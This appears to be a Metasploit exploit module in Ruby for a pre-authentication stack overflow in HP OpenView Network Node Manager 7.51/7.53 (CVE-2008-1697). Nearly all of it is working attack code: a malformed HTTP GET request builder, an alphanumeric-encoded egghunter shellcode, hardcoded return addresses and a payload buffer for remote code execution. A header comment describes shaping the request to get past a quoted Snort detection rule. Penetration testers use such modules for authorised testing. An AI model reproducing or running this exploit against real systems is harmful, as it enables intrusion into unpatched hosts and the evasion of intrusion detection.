203 lines
6.1 KiB
Ruby
203 lines
6.1 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/framework/
|
|
##
|
|
|
|
|
|
##
|
|
# This should bypass the following snort rule referenced from web-misc.rules (10/17/2008)
|
|
# alert tcp $EXTERNAL_NET any -> $HOME_NET 7510 (msg:"WEB-MISC HP OpenView Network Node Manager HTTP handling buffer overflow attempt"; flow:to_server,established; content:"GET "; depth:4; nocase; isdataat:165,relative; content:"/topology/homeBaseView"; pcre:"/GET\s+\w[^\x0a\x20]{165}/i"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,28569; reference:cve,2008-1697; classtype:attempted-admin; sid:13715; rev:3;)
|
|
# Newer versions of this rule might find this but we've taken steps to atleast bypass this rule
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = GoodRanking
|
|
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication SEH Overflow',
|
|
'Description' => %q{
|
|
This module exploits a stack overflow in HP OpenView Network Node Manager versions 7.53 and earlier.
|
|
Specifically this vulnerability is caused by a failure to properly handle user supplied input within the
|
|
HTTP request including headers and the actual URL GET request.
|
|
|
|
Exploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode
|
|
which was alphanumeric encoded by muts in the original exploit.
|
|
|
|
If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process
|
|
as soon as possible. Any connections get reset after a short period of time. This is probably some timeout
|
|
handling code that causes this.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'bannedit',
|
|
# muts wrote the original exploit and did most of the initial work
|
|
# credit where credit is due. =)
|
|
'muts'
|
|
],
|
|
|
|
'Version' => '$Revision$',
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2008-1697' ],
|
|
[ 'OSVDB', '43992' ],
|
|
[ 'BID', '28569' ],
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'WfsDelay' => 45,
|
|
'EXITFUNC' => 'thread',
|
|
'InitialAutoRunScript' => 'migrate -f',
|
|
},
|
|
'Payload' =>
|
|
{
|
|
'Space' => 1000,
|
|
'BadChars' => "\x0a\x0d\x00",
|
|
'StackAdjustment' => -3500,
|
|
},
|
|
'Platform' => 'win',
|
|
'Privileged' => true,
|
|
'Targets' =>
|
|
[
|
|
# need more but this will likely cover most cases
|
|
[ 'Automatic Targeting',
|
|
{
|
|
'auto' => true
|
|
}
|
|
],
|
|
|
|
[ 'Windows 2003/zip.dll OpenView 7.53',
|
|
{
|
|
'Ret' => 0x6d633757 # pop pop ret
|
|
}
|
|
],
|
|
|
|
[ 'Windows 2000/jvm.dll OpenView NNM 7.51',
|
|
{
|
|
'Ret' => 0x6d356c6e # pop pop ret
|
|
}
|
|
]
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Apr 02 2008'))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(7510),
|
|
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ])
|
|
], self.class)
|
|
end
|
|
|
|
|
|
def exploit
|
|
|
|
targ = target
|
|
|
|
if (target['auto'])
|
|
print_status("Detecting the remote version...")
|
|
resp = send_request_raw({'uri' => '/topology/home'}, 5)
|
|
if resp.nil?
|
|
print_status("No response to request")
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
|
|
case resp.body
|
|
when /NNM Release B.07.53/
|
|
targ = targets[1]
|
|
when /NNM Release B.07.51/
|
|
targ = targets[2]
|
|
else
|
|
raise RuntimeError, "Unable to determine a target automatically..."
|
|
# if snmp is running you could set the target based on community strings
|
|
|
|
end
|
|
end
|
|
print_status("Using target: #{targ.name}")
|
|
exploit_target(targ)
|
|
end
|
|
|
|
|
|
def exploit_target(targ)
|
|
|
|
# we have to use an egghunter in this case because of the restrictions
|
|
# on the characters we can use.
|
|
# we are using skape's egghunter alpha numeric encoded by muts
|
|
egghunter =
|
|
'%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J'+
|
|
'MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5'+
|
|
'21*-q!au-q!au-oGSePAA%JMNU%521*-D'+
|
|
'A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1'+
|
|
'z1E-oRHEPAA%JMNU%521*-3s1--331--^'+
|
|
'TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA'+
|
|
'A%JMNU%521*-R222-1111-nZJ2PAA%JMN'+
|
|
'U%521*-1-wD-1-wD-8$GwP'
|
|
|
|
print_status("Constructing the malformed http request")
|
|
|
|
buf = "http://"
|
|
buf << "\xeb" * 1101 # this gets mangled in such a way we can use less input
|
|
buf << "\x41" * 4 # sometimes less really is more
|
|
buf << "\x77\x21" # \xeb is restricted so we use a conditional jump which is always taken
|
|
buf << [targ.ret].pack('V')
|
|
buf << "G" * 32
|
|
buf << egghunter
|
|
buf << "\x41" * 100
|
|
buf << ":#{datastore['RPORT']}"
|
|
|
|
# T00W is the egg
|
|
payload_buf = "T00WT00W" + make_nops(34) + "\x83\xc4\x03" + payload.encoded
|
|
|
|
begin
|
|
connect
|
|
resp = send_request_raw({
|
|
'uri' => buf + "/topology/home",
|
|
'version' => '1.1',
|
|
'method' => 'GET',
|
|
'headers' =>
|
|
{
|
|
'Content-Type' => 'application/x-www-form-urlencoded',
|
|
'User-Agent' => datastore['UserAgent'],
|
|
},
|
|
'data' => payload_buf
|
|
})
|
|
rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR
|
|
# do nothing let the exploit live this catches the
|
|
# connection reset by peer error which is expected
|
|
end
|
|
|
|
if not resp.nil?
|
|
raise RuntimeError, "The server responded, that wasn't supposed to happen!"
|
|
end
|
|
|
|
print_status("Malformed http request sent.")
|
|
print_status("Now we wait for the egg hunter to work it's magic. thx skape!")
|
|
handler
|
|
disconnect
|
|
end
|
|
|
|
|
|
def check
|
|
|
|
resp = send_request_raw({'uri' => '/topology/home'}, 5)
|
|
if resp.nil?
|
|
print_status("No response to request")
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
|
|
if (resp.body =~ /NNM Release B.07.53/ || resp.body =~ /NNM Release B.07.52/ || resp.body =~ /NNM Release B.07.51/)
|
|
return Exploit::CheckCode::Appears
|
|
end
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
end
|